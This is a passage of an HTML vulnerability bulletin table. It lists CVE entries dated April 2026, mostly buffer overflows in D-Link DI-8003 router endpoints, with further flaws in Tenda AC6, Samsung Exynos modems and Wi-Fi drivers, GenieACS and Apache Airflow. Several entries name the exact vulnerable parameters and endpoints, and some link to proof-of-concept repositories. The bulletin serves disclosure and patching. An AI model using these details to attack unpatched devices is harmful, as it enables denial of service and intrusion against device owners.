    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50644" target="_blank" rel="noopener">CVE-2025-50644</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A vulnerability has been discovered in D-Link DI-8003 16.07.26A1, which can lead to a buffer overflow when the s parameter in the pppoe_list_opt.asp endpoint is manipulated. By sending a crafted request with an excessively large value for the s parameter, an attacker can trigger a buffer overflow condition.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50645" target="_blank" rel="noopener">CVE-2025-50645</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to insufficient input validation on the name parameter in the /qos_type_asp.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50646" target="_blank" rel="noopener">CVE-2025-50646</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1, specifically in the handling of the wans parameter in the qos.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50647" target="_blank" rel="noopener">CVE-2025-50647</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate input validation in the /tggl.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50648" target="_blank" rel="noopener">CVE-2025-50648</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper input validation in the vlan_name parameter in the /shut_set.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50649" target="_blank" rel="noopener">CVE-2025-50649</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate validation of input size in the routes_static parameter in the /router.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50650" target="_blank" rel="noopener">CVE-2025-50650</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>An issue exists in D-Link DI-8003 16.07.26A1 related to improper handling of the id parameter in the /saveparm_usb.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50652" target="_blank" rel="noopener">CVE-2025-50652</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name and mem parameters in the /time_group.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50653" target="_blank" rel="noopener">CVE-2025-50653</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of the id parameter in the /thd_member.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50654" target="_blank" rel="noopener">CVE-2025-50654</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /thd_group.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50655" target="_blank" rel="noopener">CVE-2025-50655</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the pid parameter in the /trace.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50657" target="_blank" rel="noopener">CVE-2025-50657</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the custom_error parameter in the /user.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50659" target="_blank" rel="noopener">CVE-2025-50659</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /url_member.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50660" target="_blank" rel="noopener">CVE-2025-50660</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of multiple parameters in the /url_rule.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request with parameters name, en, ips, u, time, act, rpri, and log.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50661" target="_blank" rel="noopener">CVE-2025-50661</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /url_group.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50662" target="_blank" rel="noopener">CVE-2025-50662</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /usb_paswd.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50663" target="_blank" rel="noopener">CVE-2025-50663</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /user_group.asp endpoint. The attacker can exploit this vulnerability by sending a crafted HTTP GET request with parameters name, mem, pri, and attr.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50664" target="_blank" rel="noopener">CVE-2025-50664</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of input parameters in the /web_keyword.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request via the name, en, time, mem_gb2312, and mem_utf8 parameters.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50665" target="_blank" rel="noopener">CVE-2025-50665</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of multiple parameters in the /web_post.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request in parameters such as name, en, user_id, log, and time.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50666" target="_blank" rel="noopener">CVE-2025-50666</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the iface parameter in the /wan_line_detection.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50667" target="_blank" rel="noopener">CVE-2025-50667</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the s parameter in the /web_list_opt.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50668" target="_blank" rel="noopener">CVE-2025-50668</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 and DI-8003G 19.12.10A1 due to improper handling of the wan_ping parameter in the /wan_ping.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50669" target="_blank" rel="noopener">CVE-2025-50669</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /xwgl_bwr.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request in the name, qq, and time parameters.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50670" target="_blank" rel="noopener">CVE-2025-50670</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /xwgl_ref.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request with excessively long strings in parameters name, en, user_id, shibie_name, time, act, log, and rpri.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50671" target="_blank" rel="noopener">CVE-2025-50671</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /yyxz_dlink.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50672" target="_blank" rel="noopener">CVE-2025-50672</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the http_lanport parameter in the /webgl.asp endpoint.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-50673" target="_blank" rel="noopener">CVE-2025-50673</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Tendacn[.]com -- AC6 WiFi Router</td>
    <td>Tenda AC6 15.03.05.16_multi is vulnerable to Buffer Overflow in the formSetCfm function via the funcname, funcpara1, and funcpara2 parameters.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-52221" target="_blank" rel="noopener">CVE-2025-52221</a></td>
    <td><a href="https://github.com/faqiadegege/IoTVuln/blob/main/tendaAc6_formSetCfm_funcname_overflow/detail.md" target="_blank" rel="noopener">https://github.com/faqiadegege/IoTVuln/blob/main/tendaAc6_formSetCfm_funcname_overflow/detail.md</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">D-Link[.]com -- D-Link DI-8003</td>
    <td>D-Link DI-8003 v16.07.26A1, DI-8500 v16.07.26A1, DI-8003G v17.12.21A1, DI-8200G v17.12.20A1, DI-8200 v16.07.26A1, DI-8400 v16.07.26A1, DI-8004w v16.07.26A1, DI-8100 v16.07.26A1, and DI-8100G v17.12.20A1 were discovered to contain a buffer overflow via the rd_en, rd_auth, rd_acct, http_hadmin, http_hadminpwd, rd_key, and rd_ip parameters in the radius_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-52222" target="_blank" rel="noopener">CVE-2025-52222</a></td>
    <td><a href="https://www.dlink.com/en/security-bulletin/" target="_blank" rel="noopener">https://www.dlink.com/en/security-bulletin/</a><br><a href="https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md" target="_blank" rel="noopener">https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message, issue 1 of 2.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-52908" target="_blank" rel="noopener">CVE-2025-52908</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52908/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52908/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message, issue 2 of 2.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-52909" target="_blank" rel="noopener">CVE-2025-52909</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52909/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52909/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a Denial of Service.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-54324" target="_blank" rel="noopener">CVE-2025-54324</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54324/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54324/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in SMS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. A Stack-based Buffer Overflow occurs while parsing SMS RP-DATA messages.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-54328" target="_blank" rel="noopener">CVE-2025-54328</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Improper synchronization on a global variable leads to a double free. An attacker can trigger a race condition by invoking an ioctl function concurrently from multiple threads.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-54601" target="_blank" rel="noopener">CVE-2025-54601</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54601/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54601/</a></td>
    </tr>
    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Improper synchronization on a global variable leads to a use-after-free. An attacker can trigger a race condition by invoking an ioctl function concurrently from multiple threads.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-54602" target="_blank" rel="noopener">CVE-2025-54602</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54602/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54602/</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--GenieACS</td>
    <td>In GenieACS 1.2.13, an unauthenticated access vulnerability exists in the NBI API endpoint.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-56015" target="_blank" rel="noopener">CVE-2025-56015</a></td>
    <td><a href="https://github.com/genieacs/genieacs/" target="_blank" rel="noopener">https://github.com/genieacs/genieacs/</a><br><a href="https://github.com/e1st/CVE-2025-56015" target="_blank" rel="noopener">https://github.com/e1st/CVE-2025-56015</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Apache Software Foundation--Apache Airflow</td>
    <td>When a user logged out, the JWT token the user had authenticated with was not invalidated, which could lead to reuse of that token in case it was intercepted. In Airflow 3.2 we implemented a mechanism that invalidates the token at logout. Users who are concerned about the logout scenario and the possibility of intercepted tokens should upgrade to Airflow 3.2+. Users are recommended to upgrade to version 3.2.0, which fixes this issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57735" target="_blank" rel="noopener">CVE-2025-57735</a></td>
    <td><a href="https://github.com/apache/airflow/pull/61339" target="_blank" rel="noopener">https://github.com/apache/airflow/pull/61339</a><br><a href="https://github.com/apache/airflow/pull/56633" target="_blank" rel="noopener">https://github.com/apache/airflow/pull/56633</a><br><a href="https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98" target="_blank" rel="noopener">https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem (Exynos 980, 850, 990, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 1680, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400, and Modem 5410). The absence of proper input validation leads to a Denial of Service.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57834" target="_blank" rel="noopener">CVE-2025-57834</a></td>
